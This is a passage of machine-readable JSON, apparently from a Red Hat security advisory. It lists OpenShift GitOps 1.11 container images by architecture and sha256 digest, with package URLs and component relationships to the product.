"product_id": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64"
},
"product_reference": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
